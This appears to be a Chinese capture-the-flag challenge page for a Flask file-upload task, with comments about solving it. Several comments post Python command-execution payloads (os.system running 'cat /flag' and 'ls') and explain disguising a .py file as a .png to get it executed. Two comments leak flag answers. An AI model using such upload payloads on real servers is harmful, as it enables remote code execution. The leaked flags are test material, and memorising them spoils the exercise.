Flask_FileUploadWEB 未解决

分数: 10 金币: 3
题目作者: valecalida
一  血: Lazzaro
一血奖励: 3金币
解  决: 12650
提  示:
描  述:
Flask_FileUpload
评论
1019697179 3年前

import os os.system('cat /flag')//导入OS才能使用system,cat是查询命令

回复 1

15091760453 3年前

flag{1c6b553c3a91791993b859e1625275ac}

回复 0

Cat00011cat 3年前

import os os.system('ls / -l') os.system('cat /flag')

回复 2

nf1y 3年前

为啥我返回包出现的是这样 File "/app/upload/test.jpg", line 1 SyntaxError: Non-UTF-8 code starting with '\xff' in file /app/upload/test.jpg on line 1, but no encoding declared; see http://python.org/de

回复 0
不知名学渣 3年前

@aWxvdmVjdGY 我是小白,请问大佬,我很好奇为什么传图片就会以代码形式执行,那么这个实现是类似apache的解析漏洞吗?

回复 0

aWxvdmVjdGY 3年前

1、<input type="file" name="file" accept=".jpg,.png">这里限制了格式,后端也会检查。需要将py文件后缀为png,然后上传会议python文件执行

回复 0

白猫a 3年前

这个作者可以哇,题目解的真精彩!!!

回复 1

gfpeak 3年前

<!-- flag{9e5c134c066dc490c9644ecd9655a482} -->

回复 0
aWxvdmVjdGY 3年前

不同的场景答案是不一样的

回复 0

2224525664 3年前

我只想说牛逼!!!!来自小白的感叹

回复 1

18196731832 3年前

注意换行

回复 2
aWxvdmVjdGY 3年前

用python开发工具写就好了

回复 0

甜甜 3年前

恍然大悟呀

回复 0

丶我亚索贼六 3年前

import os os.system('cat /flag')

回复 1

玲珑湾 3年前

话说传个马上去会怎样

回复 2
admin999 3年前

传了php上去提示ValueError: too many values to unpack (expected 2) // Werkzeug Debugger

回复 0

WriteUp

image
国家级划水运动员

3 金币

评分(20)

解题动态

anton_小金鱼 攻破了该题 1天前
cha8e1 攻破了该题 1天前
yehlg 攻破了该题 2天前
yu'c 攻破了该题 3天前
avaclaire 攻破了该题 3天前
Kernel1 攻破了该题 3天前
脚本gay 攻破了该题 3天前
YS_JW 攻破了该题 4天前
池屿 攻破了该题 4天前
wujita01 攻破了该题 5天前
hsk_zy 攻破了该题 5天前
zhuguangsen 攻破了该题 5天前
Hackerchen 攻破了该题 6天前
mmhhdm 攻破了该题 6天前
yangyy 攻破了该题 6天前
simple9527 攻破了该题 6天前
bugfuck2 攻破了该题 6天前
Motona_Sky 攻破了该题 7天前
kitniu 攻破了该题 9天前
nanaqilin 攻破了该题 13天前
问题反馈